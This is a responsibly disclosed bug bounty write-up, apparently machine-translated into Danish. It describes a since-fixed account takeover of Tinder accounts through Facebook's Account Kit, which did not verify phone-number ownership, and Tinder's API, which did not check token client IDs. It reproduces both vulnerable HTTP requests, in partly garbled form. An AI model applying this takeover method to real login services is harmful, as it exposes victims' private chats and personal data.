Hvordan jeg hackede Tinder-konti ved hjælp af Facebooks Account Kit og tjente $ 6.250 i bounties

Dette offentliggøres med tilladelse fra Facebook under den ansvarlige oplysningspolitik.

De sårbarheder, der er nævnt i dette blogindlæg, blev hurtigt tilsluttet af ingeniørholdene på Facebook og Tinder.

Dette indlæg handler om en sårbarhed over kontoovertagelse, jeg opdagede i Tinders ansøgning. Ved at udnytte dette kunne en angriber have fået adgang til ofrets Tinder-konto, som skal have brugt deres telefonnummer til at logge ind.

Dette kunne have været udnyttet gennem en sårbarhed i Facebooks Account Kit, som Facebook for nylig har behandlet.

Både Tinders web- og mobilapplikationer giver brugerne mulighed for at bruge deres mobiltelefonnummer til at logge ind på tjenesten. Og denne login-tjeneste leveres af Account Kit (Facebook).

Brugeren klikker på Login med telefonnummer på tinder.com, og derefter omdirigeres de til Accountkit.com for login. Hvis godkendelsen er vellykket, sender Account Kit adgangstokenet til Tinder til login.

Interessant nok kontrollerede Tinder API ikke klient-id'et på det token, der blev leveret af Account Kit.

Dette gjorde det muligt for angriberen at bruge enhver anden apps adgangstoken leveret af Account Kit til at overtage de virkelige Tinder-konti for andre brugere.

Sårbarhedsbeskrivelse

Account Kit er et produkt af Facebook, der lader folk hurtigt registrere sig og logge ind på nogle registrerede apps ved kun at bruge deres telefonnumre eller e-mail-adresser uden at have brug for en adgangskode. Det er pålideligt, let at bruge og giver brugeren et valg om, hvordan de vil tilmelde sig apps.

Tinder er en placeringsbaseret mobilapp til søgning og møde nye mennesker. Det giver brugerne mulighed for at kunne lide eller ikke lide andre brugere og derefter gå videre til en chat, hvis begge parter skubbede til højre.

Der var en sårbarhed i Account Kit, hvorigennem en angriber kunne have fået adgang til enhver brugers Account Kit-konto bare ved at bruge deres telefonnummer. En gang imellem kunne angriberen have fået fat i brugerens Kontosæt-adgangstoken, der er til stede i deres cookies (aks).

Derefter kunne angriberen bruge adgangstokenet (aks) til at logge ind på brugerens Tinder-konto ved hjælp af en sårbar API.

Hvordan min udnyttelse fungerede trin for trin

Trin 1

Først logger angriberen på offerets Account Kit-konto ved at indtaste offerets telefonnummer i " new_phone_number " i API-anmodningen vist nedenfor.

Bemærk, at Account Kit ikke bekræftede kortlægningen af ​​telefonnumre med deres engangsadgangskode. Angriberen kunne indtaste alles telefonnummer og derefter bare logge ind på ofrets konto-konto.

Derefter kunne angriberen kopiere offerets “aks” adgangstoken til Account Kit-appen fra cookies.

Den sårbare Account Kit API:

POST / opdatering / async / telefon / bekræft /? Dpr = 2 HTTP / 1.1 Host: www.accountkit.com new_phone_number = [vctim's telefonnummer] & update_request_code = c1fb2e919bb33a076a7c6fe4a9fbfa97 [angriberens anmodningskode] & bekræftelseskode = 258822 __ = brugerens kode = 0) 1 & __ dyn = & __ req = 6 & __ be = -1 & __ pc = FASERET% 3ADEFAULT & __ rev = 3496767 & fb_dtsg = & jazoest =

Trin 2

Nu gentager angriberen simpelthen følgende anmodning ved hjælp af det kopierede adgangstoken "aks" for offeret i Tinder API nedenfor.

De bliver logget ind på offerets Tinder-konto. Angriberen ville så dybest set have fuld kontrol over offerets konto. De kunne læse private chats, fulde personlige oplysninger og stryge andre brugers profiler til venstre eller højre blandt andet.

Sårbar Tinder API:

POST / v2 / auth / login / accountkit? Locale = da HTTP / 1.1

Vært: api.gotinder.com

Forbindelse: luk

Indholdslængde: 185

Oprindelse: //tinder.com

app-version: 1000000

platform: web

Brugeragent: Mozilla / 5.0 (Macintosh)

indholdstype: applikation / json

Acceptere: */*

Referer: //tinder.com/

Accept-kodning: gzip, deflater

Accept-sprog: da-US, da; q = 0,9

{“Token”: ”xxx”, ”id”: ””}

Video bevis på koncept

Tidslinje

Begge sårbarheder blev hurtigt løst af Tinder og Facebook. Facebook belønnede mig med US $ 5.000, og Tinder tildelte mig $ 1.250.

Jeg er grundlægger af AppSecure, et specialiseret cybersikkerhedsfirma med mange års erhvervet færdighed og omhyggelig ekspertise. Vi er her for at beskytte din forretning og kritiske data mod online og offline trusler eller sårbarheder.

Du kan kontakte os på [email protected] eller [email protected]